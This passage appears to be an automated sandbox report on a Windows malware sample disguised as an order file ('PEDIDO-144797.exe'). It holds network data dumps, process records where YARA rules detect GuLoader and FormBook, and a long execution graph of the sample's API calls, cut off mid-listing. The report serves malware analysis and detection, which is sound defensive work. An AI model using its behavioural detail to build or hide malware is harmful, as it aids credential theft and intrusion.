                                                                                                                                        Data Ascii: s9cr^kEw|1U4=,ohw@m ;6CoSvXldoINP)%8TP7LDk\Y!OLJ6r(m3~Q)`%aImI*:s3J O[DH\bDy6y9MQPc:{)<H0jt
                                                                                                                                        2024-10-04 08:50:45 UTC | 1255 | IN | Data Raw: c4 d6 ee a6 1e de 25 28 cd ae af 9a 59 ff dd db fe c0 ee bc 4e df be 29 56 d8 c3 78 70 0f 7a 65 28 2d 7d 42 f8 ee 9d 67 f5 3c 1a 62 67 bc ea 6b 85 b2 1e 61 cb 45 99 a8 ff c7 c7 13 d5 73 9a 75 27 56 f6 9a e5 6b 70 03 22 e1 20 c8 f6 5b 59 be 75 07 f6 ff b7 6f aa 19 1e 9a 70 3c f4 af 8a 53 9c 20 3f 08 4f fe 06 8c 37 83 a7 f1 e7 d2 f3 ff f0 59 47 c0 d8 ae 63 3f 23 88 d3 53 7a 94 e2 ac 83 63 c8 44 1f 57 bd 60 af d6 2c 2b 38 34 27 38 ce c9 62 d6 a5 ed 37 ec e3 fe fb 6c f8 72 51 72 f4 b3 92 30 08 70 ad c1 ad 26 b9 74 0c 5c 1c a2 fa 8c ad f2 ab bf d3 2c 0e 08 33 f0 3f b6 ce 4b 22 3a 40 d4 9a ed 92 18 7a 2e 9b 21 d7 f4 df 96 31 42 28 ee c1 35 fa 66 f8 46 7d 98 9a 6b 1a f1 bf 8c 0d 26 d3 f9 9c 0e d8 43 57 6f 35 7d 0b f0 ff d0 0c e2 06 57 c8 95 7e 26 96 d1 50 e8 42
                                                                                                                                        Data Ascii: %(YN)Vxpze(-}Bg<bgkaEsu'Vkp" [Yuop<S ?O7YGc?#SzcDW`,+84'8b7lrQr0p&t\,3?K":@z.!1B(5fF}k&CWo5}W~&PB


                                                                                                                                        Target ID:0
                                                                                                                                        Start time:04:50:11
                                                                                                                                        Start date:04/10/2024
                                                                                                                                        Path:C:\Users\user\Desktop\PEDIDO-144797.exe
                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                        Commandline:"C:\Users\user\Desktop\PEDIDO-144797.exe"
                                                                                                                                        Imagebase:0x400000
                                                                                                                                        File size:567'544 bytes
                                                                                                                                        MD5 hash:2C5483106FE248CCED82541B91CBA20E
                                                                                                                                        Has elevated privileges:true
                                                                                                                                        Has administrator privileges:true
                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                        Yara matches:
                                                                                                                                        • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000000.00000002.89703248997.000000000340F000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                        Reputation:low
                                                                                                                                        Has exited:true

                                                                                                                                        Target ID:2
                                                                                                                                        Start time:04:50:36
                                                                                                                                        Start date:04/10/2024
                                                                                                                                        Path:C:\Users\user\Desktop\PEDIDO-144797.exe
                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                        Commandline:"C:\Users\user\Desktop\PEDIDO-144797.exe"
                                                                                                                                        Imagebase:0x400000
                                                                                                                                        File size:567'544 bytes
                                                                                                                                        MD5 hash:2C5483106FE248CCED82541B91CBA20E
                                                                                                                                        Has elevated privileges:true
                                                                                                                                        Has administrator privileges:true
                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                        Yara matches:
                                                                                                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.90098184931.00000000323D0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.90098184931.00000000323D0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                                        Reputation:low
                                                                                                                                        Has exited:true

                                                                                                                                        Target ID:3
                                                                                                                                        Start time:04:51:17
                                                                                                                                        Start date:04/10/2024
                                                                                                                                        Path:C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                        Commandline:"C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe" -s
                                                                                                                                        Imagebase:0x140000000
                                                                                                                                        File size:16'696'840 bytes
                                                                                                                                        MD5 hash:731FB4B2E5AFBCADAABB80D642E056AC
                                                                                                                                        Has elevated privileges:false
                                                                                                                                        Has administrator privileges:false
                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                        Reputation:moderate
                                                                                                                                        Has exited:false

                                                                                                                                        Target ID:4
                                                                                                                                        Start time:04:51:17
                                                                                                                                        Start date:04/10/2024
                                                                                                                                        Path:C:\Windows\SysWOW64\SecEdit.exe
                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                        Commandline:"C:\Windows\SysWOW64\SecEdit.exe"
                                                                                                                                        Imagebase:0x670000
                                                                                                                                        File size:37'888 bytes
                                                                                                                                        MD5 hash:BFC13856291E4B804D33BBAEFC8CB3B5
                                                                                                                                        Has elevated privileges:false
                                                                                                                                        Has administrator privileges:false
                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                        Yara matches:
                                                                                                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.91632908078.0000000002B00000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.91632908078.0000000002B00000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.91633128931.0000000002CD0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.91633128931.0000000002CD0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                                                        Reputation:moderate
                                                                                                                                        Has exited:true

Target ID:5
Start time:04:53:51
Start date:04/10/2024
Path:C:\Windows\explorer.exe
Wow64 process (32bit):false
Commandline:C:\Windows\Explorer.EXE
Imagebase:0x7ff6c98f0000
File size:4'849'904 bytes
MD5 hash:5EA66FF5AE5612F921BC9DA23BAC95F7
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Reputation:high
Has exited:false


Execution Graph

Execution Coverage:17.3%
Dynamic/Decrypted Code Coverage:13.2%
Signature Coverage:19.2%
Total number of Nodes:1590
Total number of Limit Nodes:37
                                                                                                                                          execution_graph 5086 10001000 5089 1000101b 5086->5089 5096 10001516 5089->5096 5091 10001020 5092 10001024 5091->5092 5093 10001027 GlobalAlloc 5091->5093 5094 1000153d 3 API calls 5092->5094 5093->5092 5095 10001019 5094->5095 5098 1000151c 5096->5098 5097 10001522 5097->5091 5098->5097 5099 1000152e GlobalFree 5098->5099 5099->5091 4198 401941 4199 401943 4198->4199 4200 402c37 17 API calls 4199->4200 4201 401948 4200->4201 4204 405abe 4201->4204 4243 405d89 4204->4243 4207 405ae6 DeleteFileW 4209 401951 4207->4209 4208 405afd 4211 405c28 4208->4211 4257 4063b0 lstrcpynW 4208->4257 4211->4209 4275 4066f3 FindFirstFileW 4211->4275 4212 405b23 4213 405b36 4212->4213 4214 405b29 lstrcatW 4212->4214 4258 405ccd lstrlenW 4213->4258 4215 405b3c 4214->4215 4218 405b4c lstrcatW 4215->4218 4220 405b57 lstrlenW FindFirstFileW 4215->4220 4218->4220 4222 405c1d 4220->4222 4241 405b79 4220->4241 4221 405c46 4278 405c81 lstrlenW CharPrevW 4221->4278 4222->4211 4225 405c00 FindNextFileW 4228 405c16 FindClose 4225->4228 4225->4241 4226 405a76 5 API calls 4229 405c58 4226->4229 4228->4222 4230 405c72 4229->4230 4231 405c5c 4229->4231 4233 405414 24 API calls 4230->4233 4231->4209 4234 405414 24 API calls 4231->4234 4233->4209 4236 405c69 4234->4236 4235 405abe 60 API calls 4235->4241 4237 406176 36 API calls 4236->4237 4239 405c70 4237->4239 4238 405414 24 API calls 4238->4225 4239->4209 4240 405414 24 API calls 4240->4241 4241->4225 4241->4235 4241->4238 4241->4240 4262 4063b0 lstrcpynW 4241->4262 4263 405a76 4241->4263 4271 406176 MoveFileExW 4241->4271 4281 4063b0 lstrcpynW 4243->4281 4245 405d9a 4282 405d2c CharNextW CharNextW 4245->4282 4248 405ade 4248->4207 4248->4208 4249 406644 5 API calls 4254 405db0 4249->4254 4250 405de1 lstrlenW 4251 405dec 4250->4251 4250->4254 4253 405c81 3 API calls 4251->4253 4252 4066f3 2 API calls 4252->4254 
4255 405df1 GetFileAttributesW 4253->4255 4254->4248 4254->4250 4254->4252 4256 405ccd 2 API calls 4254->4256 4255->4248 4256->4250 4257->4212 4259 405cdb 4258->4259 4260 405ce1 CharPrevW 4259->4260 4261 405ced 4259->4261 4260->4259 4260->4261 4261->4215 4262->4241 4288 405e7d GetFileAttributesW 4263->4288 4266 405aa3 4266->4241 4267 405a91 RemoveDirectoryW 4269 405a9f 4267->4269 4268 405a99 DeleteFileW 4268->4269 4269->4266 4270 405aaf SetFileAttributesW 4269->4270 4270->4266 4272 406197 4271->4272 4273 40618a 4271->4273 4272->4241 4291 405ffc 4273->4291 4276 405c42 4275->4276 4277 406709 FindClose 4275->4277 4276->4209 4276->4221 4277->4276 4279 405c4c 4278->4279 4280 405c9d lstrcatW 4278->4280 4279->4226 4280->4279 4281->4245 4283 405d49 4282->4283 4286 405d5b 4282->4286 4285 405d56 CharNextW 4283->4285 4283->4286 4284 405d7f 4284->4248 4284->4249 4285->4284 4286->4284 4287 405cae CharNextW 4286->4287 4287->4286 4289 405a82 4288->4289 4290 405e8f SetFileAttributesW 4288->4290 4289->4266 4289->4267 4289->4268 4290->4289 4292 406052 GetShortPathNameW 4291->4292 4293 40602c 4291->4293 4294 406171 4292->4294 4295 406067 4292->4295 4318 405ea2 GetFileAttributesW CreateFileW 4293->4318 4294->4272 4295->4294 4297 40606f wsprintfA 4295->4297 4299 4063d2 17 API calls 4297->4299 4298 406036 CloseHandle GetShortPathNameW 4298->4294 4300 40604a 4298->4300 4301 406097 4299->4301 4300->4292 4300->4294 4319 405ea2 GetFileAttributesW CreateFileW 4301->4319 4303 4060a4 4303->4294 4304 4060b3 GetFileSize GlobalAlloc 4303->4304 4305 4060d5 4304->4305 4306 40616a CloseHandle 4304->4306 4320 405f25 ReadFile 4305->4320 4306->4294 4311 4060f4 lstrcpyA 4314 406116 4311->4314 4312 406108 4313 405e07 4 API calls 4312->4313 4313->4314 4315 40614d SetFilePointer 4314->4315 4327 405f54 WriteFile 4315->4327 4318->4298 4319->4303 4321 405f43 4320->4321 4321->4306 4322 405e07 lstrlenA 4321->4322 4323 405e48 lstrlenA 4322->4323 4324 405e50 4323->4324 4325 405e21 lstrcmpiA 4323->4325 4324->4311 
4324->4312 4325->4324 4326 405e3f CharNextA 4325->4326 4326->4323 4328 405f72 GlobalFree 4327->4328 4328->4306 4329 4015c1 4330 402c37 17 API calls 4329->4330 4331 4015c8 4330->4331 4332 405d2c 4 API calls 4331->4332 4344 4015d1 4332->4344 4333 401631 4335 401663 4333->4335 4336 401636 4333->4336 4334 405cae CharNextW 4334->4344 4339 401423 24 API calls 4335->4339 4356 401423 4336->4356 4346 40165b 4339->4346 4343 40164a SetCurrentDirectoryW 4343->4346 4344->4333 4344->4334 4345 401617 GetFileAttributesW 4344->4345 4348 40597d 4344->4348 4351 4058e3 CreateDirectoryW 4344->4351 4360 405960 CreateDirectoryW 4344->4360 4345->4344 4363 40678a GetModuleHandleA 4348->4363 4352 405930 4351->4352 4353 405934 GetLastError 4351->4353 4352->4344 4353->4352 4354 405943 SetFileSecurityW 4353->4354 4354->4352 4355 405959 GetLastError 4354->4355 4355->4352 4357 405414 24 API calls 4356->4357 4358 401431 4357->4358 4359 4063b0 lstrcpynW 4358->4359 4359->4343 4361 405970 4360->4361 4362 405974 GetLastError 4360->4362 4361->4344 4362->4361 4364 4067b0 GetProcAddress 4363->4364 4365 4067a6 4363->4365 4367 405984 4364->4367 4369 40671a GetSystemDirectoryW 4365->4369 4367->4344 4368 4067ac 4368->4364 4368->4367 4370 40673c wsprintfW LoadLibraryExW 4369->4370 4370->4368 4375 401e43 4383 402c15 4375->4383 4377 401e49 4378 402c15 17 API calls 4377->4378 4379 401e55 4378->4379 4380 401e61 ShowWindow 4379->4380 4381 401e6c EnableWindow 4379->4381 4382 402abf 4380->4382 4381->4382 4384 4063d2 17 API calls 4383->4384 4385 402c2a 4384->4385 4385->4377 4390 402644 4391 402c15 17 API calls 4390->4391 4400 402653 4391->4400 4392 402790 4393 40269d ReadFile 4393->4392 4393->4400 4394 402736 4394->4392 4394->4400 4404 405f83 SetFilePointer 4394->4404 4395 405f25 ReadFile 4395->4400 4397 402792 4413 4062f7 wsprintfW 4397->4413 4398 4026dd MultiByteToWideChar 4398->4400 4400->4392 4400->4393 4400->4394 4400->4395 4400->4397 4400->4398 4401 402703 SetFilePointer MultiByteToWideChar 4400->4401 4402 
4027a3 4400->4402 4401->4400 4402->4392 4403 4027c4 SetFilePointer 4402->4403 4403->4392 4405 405f9f 4404->4405 4412 405fbb 4404->4412 4406 405f25 ReadFile 4405->4406 4407 405fab 4406->4407 4408 405fc4 SetFilePointer 4407->4408 4409 405fec SetFilePointer 4407->4409 4407->4412 4408->4409 4410 405fcf 4408->4410 4409->4412 4411 405f54 WriteFile 4410->4411 4411->4412 4412->4394 4413->4392 5107 402348 5108 402c37 17 API calls 5107->5108 5109 402357 5108->5109 5110 402c37 17 API calls 5109->5110 5111 402360 5110->5111 5112 402c37 17 API calls 5111->5112 5113 40236a GetPrivateProfileStringW 5112->5113 5117 4016cc 5118 402c37 17 API calls 5117->5118 5119 4016d2 GetFullPathNameW 5118->5119 5120 4016ec 5119->5120 5126 40170e 5119->5126 5122 4066f3 2 API calls 5120->5122 5120->5126 5121 401723 GetShortPathNameW 5123 402abf 5121->5123 5124 4016fe 5122->5124 5124->5126 5127 4063b0 lstrcpynW 5124->5127 5126->5121 5126->5123 5127->5126 5128 401b4d 5129 402c37 17 API calls 5128->5129 5130 401b54 5129->5130 5131 402c15 17 API calls 5130->5131 5132 401b5d wsprintfW 5131->5132 5133 402abf 5132->5133 5134 4047cd 5135 404803 5134->5135 5136 4047dd 5134->5136 5144 4043ac 5135->5144 5141 404345 5136->5141 5140 4047ea SetDlgItemTextW 5140->5135 5142 4063d2 17 API calls 5141->5142 5143 404350 SetDlgItemTextW 5142->5143 5143->5140 5145 4043c4 GetWindowLongW 5144->5145 5155 40444d 5144->5155 5146 4043d5 5145->5146 5145->5155 5147 4043e4 GetSysColor 5146->5147 5148 4043e7 5146->5148 5147->5148 5149 4043f7 SetBkMode 5148->5149 5150 4043ed SetTextColor 5148->5150 5151 404415 5149->5151 5152 40440f GetSysColor 5149->5152 5150->5149 5153 404426 5151->5153 5154 40441c SetBkColor 5151->5154 5152->5151 5153->5155 5156 404440 CreateBrushIndirect 5153->5156 5157 404439 DeleteObject 5153->5157 5154->5153 5156->5155 5157->5156 5158 401f52 5159 402c37 17 API calls 5158->5159 5160 401f59 5159->5160 5161 4066f3 2 API calls 5160->5161 5162 401f5f 5161->5162 5164 401f70 5162->5164 5165 4062f7 wsprintfW 
5162->5165 5165->5164 5166 402253 5167 402c37 17 API calls 5166->5167 5168 402259 5167->5168 5169 402c37 17 API calls 5168->5169 5170 402262 5169->5170 5171 402c37 17 API calls 5170->5171 5172 40226b 5171->5172 5173 4066f3 2 API calls 5172->5173 5174 402274 5173->5174 5175 402285 lstrlenW lstrlenW 5174->5175 5176 402278 5174->5176 5178 405414 24 API calls 5175->5178 5177 405414 24 API calls 5176->5177 5180 402280 5177->5180 5179 4022c3 SHFileOperationW 5178->5179 5179->5176 5179->5180 5181 405553 5182 405574 GetDlgItem GetDlgItem GetDlgItem 5181->5182 5183 4056fd 5181->5183 5226 40437a SendMessageW 5182->5226 5185 405706 GetDlgItem CreateThread CloseHandle 5183->5185 5186 40572e 5183->5186 5185->5186 5188 405759 5186->5188 5189 405745 ShowWindow ShowWindow 5186->5189 5190 40577e 5186->5190 5187 4055e4 5192 4055eb GetClientRect GetSystemMetrics SendMessageW SendMessageW 5187->5192 5191 4057b9 5188->5191 5194 405793 ShowWindow 5188->5194 5195 40576d 5188->5195 5228 40437a SendMessageW 5189->5228 5196 4043ac 8 API calls 5190->5196 5191->5190 5201 4057c7 SendMessageW 5191->5201 5199 405659 5192->5199 5200 40563d SendMessageW SendMessageW 5192->5200 5197 4057b3 5194->5197 5198 4057a5 5194->5198 5229 40431e 5195->5229 5203 40578c 5196->5203 5205 40431e SendMessageW 5197->5205 5204 405414 24 API calls 5198->5204 5206 40566c 5199->5206 5207 40565e SendMessageW 5199->5207 5200->5199 5201->5203 5208 4057e0 CreatePopupMenu 5201->5208 5204->5197 5205->5191 5210 404345 18 API calls 5206->5210 5207->5206 5209 4063d2 17 API calls 5208->5209 5211 4057f0 AppendMenuW 5209->5211 5212 40567c 5210->5212 5213 405820 TrackPopupMenu 5211->5213 5214 40580d GetWindowRect 5211->5214 5215 405685 ShowWindow 5212->5215 5216 4056b9 GetDlgItem SendMessageW 5212->5216 5213->5203 5218 40583b 5213->5218 5214->5213 5219 4056a8 5215->5219 5220 40569b ShowWindow 5215->5220 5216->5203 5217 4056e0 SendMessageW SendMessageW 5216->5217 5217->5203 5221 405857 SendMessageW 5218->5221 5227 40437a SendMessageW 
5219->5227 5220->5219 5221->5221 5222 405874 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 5221->5222 5224 405899 SendMessageW 5222->5224 5224->5224 5225 4058c2 GlobalUnlock SetClipboardData CloseClipboard 5224->5225 5225->5203 5226->5187 5227->5216 5228->5188 5230 404325 5229->5230 5231 40432b SendMessageW 5229->5231 5230->5231 5231->5190 5232 401956 5233 402c37 17 API calls 5232->5233 5234 40195d lstrlenW 5233->5234 5235 40258c 5234->5235 5038 4014d7 5039 402c15 17 API calls 5038->5039 5040 4014dd Sleep 5039->5040 5042 402abf 5040->5042 5236 401d57 GetDlgItem GetClientRect 5237 402c37 17 API calls 5236->5237 5238 401d89 LoadImageW SendMessageW 5237->5238 5239 401da7 DeleteObject 5238->5239 5240 402abf 5238->5240 5239->5240 5241 4022d7 5242 4022f1 5241->5242 5243 4022de 5241->5243 5244 4063d2 17 API calls 5243->5244 5245 4022eb 5244->5245 5246 405a12 MessageBoxIndirectW 5245->5246 5246->5242 5247 402dd7 5248 402e02 5247->5248 5249 402de9 SetTimer 5247->5249 5250 402e50 5248->5250 5251 402e56 MulDiv 5248->5251 5249->5248 5252 402e10 wsprintfW SetWindowTextW SetDlgItemTextW 5251->5252 5252->5250 5254 404459 lstrcpynW lstrlenW 5043 40175c 5044 402c37 17 API calls 5043->5044 5045 401763 5044->5045 5046 405ed1 2 API calls 5045->5046 5047 40176a 5046->5047 5048 405ed1 2 API calls 5047->5048 5048->5047 5061 4023de 5062 402c37 17 API calls 5061->5062 5063 4023f0 5062->5063 5064 402c37 17 API calls 5063->5064 5065 4023fa 5064->5065 5078 402cc7 5065->5078 5068 402432 5071 402c15 17 API calls 5068->5071 5073 40243e 5068->5073 5069 402885 5070 402c37 17 API calls 5074 402428 lstrlenW 5070->5074 5071->5073 5072 40245d RegSetValueExW 5076 402473 RegCloseKey 5072->5076 5073->5072 5075 4031ba 44 API calls 5073->5075 5074->5068 5075->5072 5076->5069 5079 402ce2 5078->5079 5082 40624b 5079->5082 5083 40625a 5082->5083 5084 40240a 5083->5084 5085 406265 RegCreateKeyExW 5083->5085 5084->5068 5084->5069 5084->5070 5085->5084 5262 402862 5263 402c37 17 API calls 5262->5263 5264 
402869 FindFirstFileW 5263->5264 5265 402891 5264->5265 5269 40287c 5264->5269 5270 4062f7 wsprintfW 5265->5270 5267 40289a 5271 4063b0 lstrcpynW 5267->5271 5270->5267 5271->5269 5272 4044e2 5273 4044fa 5272->5273 5280 404614 5272->5280 5277 404345 18 API calls 5273->5277 5274 40467e 5275 404748 5274->5275 5276 404688 GetDlgItem 5274->5276 5282 4043ac 8 API calls 5275->5282 5278 4046a2 5276->5278 5279 404709 5276->5279 5281 404561 5277->5281 5278->5279 5286 4046c8 SendMessageW LoadCursorW SetCursor 5278->5286 5279->5275 5287 40471b 5279->5287 5280->5274 5280->5275 5283 40464f GetDlgItem SendMessageW 5280->5283 5285 404345 18 API calls 5281->5285 5296 404743 5282->5296 5305 404367 EnableWindow 5283->5305 5289 40456e CheckDlgButton 5285->5289 5309 404791 5286->5309 5291 404731 5287->5291 5292 404721 SendMessageW 5287->5292 5288 404679 5306 40476d 5288->5306 5303 404367 EnableWindow 5289->5303 5291->5296 5297 404737 SendMessageW 5291->5297 5292->5291 5297->5296 5298 40458c GetDlgItem 5304 40437a SendMessageW 5298->5304 5300 4045a2 SendMessageW 5301 4045c8 SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 5300->5301 5302 4045bf GetSysColor 5300->5302 5301->5296 5302->5301 5303->5298 5304->5300 5305->5288 5307 404780 SendMessageW 5306->5307 5308 40477b 5306->5308 5307->5274 5308->5307 5312 4059d8 ShellExecuteExW 5309->5312 5311 4046f7 LoadCursorW SetCursor 5311->5279 5312->5311 5313 401563 5314 402a65 5313->5314 5317 4062f7 wsprintfW 5314->5317 5316 402a6a 5317->5316 5318 401968 5319 402c15 17 API calls 5318->5319 5320 40196f 5319->5320 5321 402c15 17 API calls 5320->5321 5322 40197c 5321->5322 5323 402c37 17 API calls 5322->5323 5324 401993 lstrlenW 5323->5324 5325 4019a4 5324->5325 5326 4019e5 5325->5326 5330 4063b0 lstrcpynW 5325->5330 5328 4019d5 5328->5326 5329 4019da lstrlenW 5328->5329 5329->5326 5330->5328 4458 4027e9 4459 4027f0 4458->4459 4461 402a6a 4458->4461 4460 402c15 17 API calls 4459->4460 4462 4027f7 4460->4462 4463 402806 SetFilePointer 
4462->4463 4463->4461 4464 402816 4463->4464 4466 4062f7 wsprintfW 4464->4466 4466->4461 5331 100018a9 5333 100018cc 5331->5333 5332 10001911 5335 10001272 2 API calls 5332->5335 5333->5332 5334 100018ff GlobalFree 5333->5334 5334->5332 5336 10001a87 GlobalFree GlobalFree 5335->5336 5337 40166a 5338 402c37 17 API calls 5337->5338 5339 401670 5338->5339 5340 4066f3 2 API calls 5339->5340 5341 401676 5340->5341 5342 404b6a 5343 404b96 5342->5343 5344 404b7a 5342->5344 5346 404bc9 5343->5346 5347 404b9c SHGetPathFromIDListW 5343->5347 5353 4059f6 GetDlgItemTextW 5344->5353 5349 404bac 5347->5349 5352 404bb3 SendMessageW 5347->5352 5348 404b87 SendMessageW 5348->5343 5351 40140b 2 API calls 5349->5351 5351->5352 5352->5346 5353->5348 5354 403e6c 5355 403e84 5354->5355 5356 403fbf 5354->5356 5355->5356 5357 403e90 5355->5357 5358 403fd0 GetDlgItem GetDlgItem 5356->5358 5359 404010 5356->5359 5360 403e9b SetWindowPos 5357->5360 5361 403eae 5357->5361 5362 404345 18 API calls 5358->5362 5363 40406a 5359->5363 5371 401389 2 API calls 5359->5371 5360->5361 5365 403eb3 ShowWindow 5361->5365 5366 403ecb 5361->5366 5367 403ffa SetClassLongW 5362->5367 5364 404391 SendMessageW 5363->5364 5384 403fba 5363->5384 5381 40407c 5364->5381 5365->5366 5368 403ed3 DestroyWindow 5366->5368 5369 403eed 5366->5369 5370 40140b 2 API calls 5367->5370 5422 4042ce 5368->5422 5372 403ef2 SetWindowLongW 5369->5372 5373 403f03 5369->5373 5370->5359 5374 404042 5371->5374 5372->5384 5377 403f0f GetDlgItem 5373->5377 5392 403f7a 5373->5392 5374->5363 5378 404046 SendMessageW 5374->5378 5375 40140b 2 API calls 5375->5381 5376 4042d0 DestroyWindow EndDialog 5376->5422 5382 403f22 SendMessageW IsWindowEnabled 5377->5382 5383 403f3f 5377->5383 5378->5384 5379 4043ac 8 API calls 5379->5384 5380 4042ff ShowWindow 5380->5384 5381->5375 5381->5376 5381->5384 5385 4063d2 17 API calls 5381->5385 5395 404345 18 API calls 5381->5395 5397 404345 18 API calls 5381->5397 5413 404210 DestroyWindow 5381->5413 
5382->5383 5382->5384 5386 403f4c 5383->5386 5387 403f93 SendMessageW 5383->5387 5388 403f5f 5383->5388 5396 403f44 5383->5396 5385->5381 5386->5387 5386->5396 5387->5392 5390 403f67 5388->5390 5391 403f7c 5388->5391 5389 40431e SendMessageW 5389->5392 5393 40140b 2 API calls 5390->5393 5394 40140b 2 API calls 5391->5394 5392->5379 5393->5396 5394->5396 5395->5381 5396->5389 5396->5392 5398 4040f7 GetDlgItem 5397->5398 5399 404114 ShowWindow EnableWindow 5398->5399 5400 40410c 5398->5400 5423 404367 EnableWindow 5399->5423 5400->5399 5402 40413e EnableWindow 5407 404152 5402->5407 5403 404157 GetSystemMenu EnableMenuItem SendMessageW 5404 404187 SendMessageW 5403->5404 5403->5407 5404->5407 5406 403e4d 18 API calls 5406->5407 5407->5403 5407->5406 5424 40437a SendMessageW 5407->5424 5425 4063b0 lstrcpynW 5407->5425 5409 4041b6 lstrlenW 5410 4063d2 17 API calls 5409->5410 5411 4041cc SetWindowTextW 5410->5411 5412 401389 2 API calls 5411->5412 5412->5381 5414 40422a CreateDialogParamW 5413->5414 5413->5422 5415 40425d 5414->5415 5414->5422 5416 404345 18 API calls 5415->5416 5417 404268 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 5416->5417 5418 401389 2 API calls 5417->5418 5419 4042ae 5418->5419 5419->5384 5420 4042b6 ShowWindow 5419->5420 5421 404391 SendMessageW 5420->5421 5421->5422 5422->5380 5422->5384 5423->5402 5424->5407 5425->5409 5426 401ced 5427 402c15 17 API calls 5426->5427 5428 401cf3 IsWindow 5427->5428 5429 401a20 5428->5429 4962 40176f 4963 402c37 17 API calls 4962->4963 4964 401776 4963->4964 4965 401796 4964->4965 4966 40179e 4964->4966 5002 4063b0 lstrcpynW 4965->5002 5003 4063b0 lstrcpynW 4966->5003 4969 40179c 4973 406644 5 API calls 4969->4973 4970 4017a9 4971 405c81 3 API calls 4970->4971 4972 4017af lstrcatW 4971->4972 4972->4969 4978 4017bb 4973->4978 4974 4066f3 2 API calls 4974->4978 4975 4017f7 4976 405e7d 2 API calls 4975->4976 4976->4978 4978->4974 4978->4975 4979 4017cd CompareFileTime 4978->4979 4980 40188d 4978->4980 4987 
4063d2 17 API calls 4978->4987 4992 4063b0 lstrcpynW 4978->4992 4997 405a12 MessageBoxIndirectW 4978->4997 4998 401864 4978->4998 5001 405ea2 GetFileAttributesW CreateFileW 4978->5001 4979->4978 4981 405414 24 API calls 4980->4981 4983 401897 4981->4983 4982 405414 24 API calls 5000 401879 4982->5000 4984 4031ba 44 API calls 4983->4984 4985 4018aa 4984->4985 4986 4018be SetFileTime 4985->4986 4988 4018d0 CloseHandle 4985->4988 4986->4988 4987->4978 4989 4018e1 4988->4989 4988->5000 4990 4018e6 4989->4990 4991 4018f9 4989->4991 4993 4063d2 17 API calls 4990->4993 4994 4063d2 17 API calls 4991->4994 4992->4978 4995 4018ee lstrcatW 4993->4995 4996 401901 4994->4996 4995->4996 4999 405a12 MessageBoxIndirectW 4996->4999 4997->4978 4998->4982 4998->5000 4999->5000 5001->4978 5002->4969 5003->4970 5437 402570 5438 402c37 17 API calls 5437->5438 5439 402577 5438->5439 5442 405ea2 GetFileAttributesW CreateFileW 5439->5442 5441 402583 5442->5441 5004 401b71 5005 401bc2 5004->5005 5006 401b7e 5004->5006 5008 401bc7 5005->5008 5009 401bec GlobalAlloc 5005->5009 5007 401c07 5006->5007 5012 401b95 5006->5012 5010 4063d2 17 API calls 5007->5010 5022 4022f1 5007->5022 5008->5022 5025 4063b0 lstrcpynW 5008->5025 5011 4063d2 17 API calls 5009->5011 5014 4022eb 5010->5014 5011->5007 5023 4063b0 lstrcpynW 5012->5023 5018 405a12 MessageBoxIndirectW 5014->5018 5016 401bd9 GlobalFree 5016->5022 5017 401ba4 5024 4063b0 lstrcpynW 5017->5024 5018->5022 5020 401bb3 5026 4063b0 lstrcpynW 5020->5026 5023->5017 5024->5020 5025->5016 5026->5022 5027 4024f2 5028 402c77 17 API calls 5027->5028 5029 4024fc 5028->5029 5030 402c15 17 API calls 5029->5030 5031 402505 5030->5031 5032 402521 RegEnumKeyW 5031->5032 5033 40252d RegEnumValueW 5031->5033 5036 402885 5031->5036 5034 402549 RegCloseKey 5032->5034 5033->5034 5035 402542 5033->5035 5034->5036 5035->5034 5450 401a72 5451 402c15 17 API calls 5450->5451 5452 401a78 5451->5452 5453 402c15 17 API calls 5452->5453 5454 401a20 5453->5454 5455 401573 
5456 401583 ShowWindow 5455->5456 5457 40158c 5455->5457 5456->5457 5458 40159a ShowWindow 5457->5458 5459 402abf 5457->5459 5458->5459 5460 4014f5 SetForegroundWindow 5461 402abf 5460->5461 5462 100016b6 5463 100016e5 5462->5463 5464 10001b18 22 API calls 5463->5464 5465 100016ec 5464->5465 5466 100016f3 5465->5466 5467 100016ff 5465->5467 5468 10001272 2 API calls 5466->5468 5469 10001726 5467->5469 5470 10001709 5467->5470 5478 100016fd 5468->5478 5472 10001750 5469->5472 5473 1000172c 5469->5473 5471 1000153d 3 API calls 5470->5471 5475 1000170e 5471->5475 5474 1000153d 3 API calls 5472->5474 5476 100015b4 3 API calls 5473->5476 5474->5478 5479 100015b4 3 API calls 5475->5479 5477 10001731 5476->5477 5480 10001272 2 API calls 5477->5480 5481 10001714 5479->5481 5482 10001737 GlobalFree 5480->5482 5483 10001272 2 API calls 5481->5483 5482->5478 5484 1000174b GlobalFree 5482->5484 5485 1000171a GlobalFree 5483->5485 5484->5478 5485->5478 5486 401e77 5487 402c37 17 API calls 5486->5487 5488 401e7d 5487->5488 5489 402c37 17 API calls 5488->5489 5490 401e86 5489->5490 5491 402c37 17 API 